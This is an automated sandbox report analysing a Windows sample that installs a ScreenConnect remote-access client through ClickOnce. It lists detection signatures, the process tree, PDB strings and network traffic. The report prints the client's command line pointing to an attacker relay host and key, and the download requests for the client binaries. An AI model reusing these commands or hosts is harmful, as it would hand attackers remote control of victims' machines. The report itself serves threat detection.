Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe

Overview

General Information

Sample name:SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe
Analysis ID:1638406
MD5:f575dfa1a624610b143b2a699be652bf
SHA1:4190ab427f3b77782569ac92f22bce1395cdc13e
SHA256:38cb2c4523fa8863671c8895686fecaa57649876ac9f17dc98edc07f0ff2ee84
Tags:ConnectWiseexeuser-SecuriteInfoCom
Infos:

Detection

ScreenConnect Tool
Score:51
Range:0 - 100
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Detected potential unwanted application
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Sigma detected: Potentially Suspicious Child Process Of ClickOnce Application
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe (PID: 6820 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe" MD5: F575DFA1A624610B143B2A699BE652BF)
    • dfsvc.exe (PID: 6956 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 6472 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe" MD5: AFA993C978BC52D51E8AF08A02892B4E)
        • ScreenConnect.ClientService.exe (PID: 7040 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=variols.ephelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQBN%2fsDy6XX2LDmcpyEoKK55JwThlRr7YHNGe39snOuHFtnjCyK72cZJH78V0V1YAf3iHC4VrBqpgJlkVuiU31AA%2fvSAfza7nhZjCa5ykV2NAakmwwsZZcF4P1vkpVkI7ANPAC%2bVyPuI2q4BXqVaSlq5q6E2QfxXeftcqNGKOU7f6LwNITHSyFLXqkb6omGbacpFoHOXIhxtO51vc7VoYDnePo%2bPLojTyIgk0TnsKSl3v5MmaDGdZnaRO%2fgpfn0w%2fd8d4r7vK%2b35r8AOTYEvrTtJo%2bk50eZpwyQ3Wb4JzVjk4643SyQu2kEB3raxmEp6Lu%2bCnvj%2fq6inamW4uCChS0u0&r=&i=" "1" MD5: D3E628C507DC331BAB3DE1178088C978)
          • WerFault.exe (PID: 5640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6120 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6820 -s 860 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000004.00000002.1496898405.000000000270A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000001.00000002.2709412544.000002728031A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Process Memory Space: dfsvc.exe PID: 6956JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6472JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                4.0.ScreenConnect.WindowsClient.exe.350000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.8, DestinationIsIpv6: false, DestinationPort: 49683, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 6956, Protocol: tcp, SourceIp: 172.67.152.68, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: Potentially Suspicious Child Process Of ClickOnce Application
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1304, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1304, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=variols.ephelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQBN%2fsDy6XX2LDmcpyEoKK55JwThlRr7YHNGe39snOuHFtnjCyK72cZJH78V0V1YAf3iHC4VrBqpgJlkVuiU31AA%2fvSAfza7nhZjCa5ykV2NAakmwwsZZcF4P1vkpVkI7ANPAC%2bVyPuI2q4BXqVaSlq5q6E2QfxXeftcqNGKOU7f6LwNITHSyFLXqkb6omGbacpFoHOXIhxtO51vc7VoYDnePo%2bPLojTyIgk0TnsKSl3v5MmaDGdZnaRO%2fgpfn0w%2fd8d4r7vK%2b35r8AOTYEvrTtJo%2bk50eZpwyQ3Wb4JzVjk4643SyQu2kEB3raxmEp6Lu%2bCnvj%2fq6inamW4uCChS0u0&r=&i=" "1", ParentImage: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe, ParentProcessId: 7040, ParentProcessName: ScreenConnect.ClientService.exe, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1304, ProcessId: 5640, ProcessName: WerFault.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeVirustotal: Detection: 17%Perma Link
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeReversingLabs: Detection: 26%
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00761000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to behavior

                  Compliance

                  barindex
                  EXE planting / hijacking vulnerabilities found
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to behavior
                  Uses 32bit PE files
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  PE / OLE file has a valid certificate
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: certificate valid
                  Uses secure TLS version for HTTPS connections
                  Source: unknownHTTPS traffic detected: 172.67.152.68:443 -> 192.168.2.8:49683 version: TLS 1.2
                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Binary contains paths to debug symbols
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe
                  Source: Binary string: (}C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb@ `5M source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.00000000007FC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: @(o.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdbJ source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\ScreenConnect.ClientService.pdbpdbice.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: ScreenConnect.Windows.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb8 source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: %%.pdbnt( source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: \ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: ScreenConnect.ClientService.pdb8 source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: ScreenConnect.Core.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2709412544.000002728079C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280238000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280610000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496697785.0000000000D20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496898405.000000000288E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000005.00000002.1444630870.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000005.00000000.1105925658.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2709412544.0000027280088000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496639128.0000000000CD2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: o0C:\Windows\mscorlib.pdb[!x source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb;?*b source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.pdbl source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: ?(oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.ClientService.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Xml.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: oXC:\Windows\ScreenConnect.ClientService.pdbx source: ScreenConnect.ClientService.exe, 00000005.00000002.1443855463.0000000000558000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2709412544.00000272807CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280522000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280234000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728060C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000005.00000002.1445175509.0000000004B22000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.000000000075E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2709412544.0000027280614000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.00000272806D5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728023C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000005.00000002.1445573934.0000000005112000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbd8m source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.2709412544.0000027280088000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496639128.0000000000CD2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: System.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERE665.tmp.dmp.8.dr
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00764B9B FindFirstFileExA,0_2_00764B9B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.8:49710 -> 95.214.234.11:8880
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=variols.ephelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQBN%2fsDy6XX2LDmcpyEoKK55JwThlRr7YHNGe39snOuHFtnjCyK72cZJH78V0V1YAf3iHC4VrBqpgJlkVuiU31AA%2fvSAfza7nhZjCa5ykV2NAakmwwsZZcF4P1vkpVkI7ANPAC%2bVyPuI2q4BXqVaSlq5q6E2QfxXeftcqNGKOU7f6LwNITHSyFLXqkb6omGbacpFoHOXIhxtO51vc7VoYDnePo%2bPLojTyIgk0TnsKSl3v5MmaDGdZnaRO%2fgpfn0w%2fd8d4r7vK%2b35r8AOTYEvrTtJo%2bk50eZpwyQ3Wb4JzVjk4643SyQu2kEB3raxmEp6Lu%2bCnvj%2fq6inamW4uCChS0u0&r=&i= HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: Joe Sandbox ViewIP Address: 172.67.152.68 172.67.152.68
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
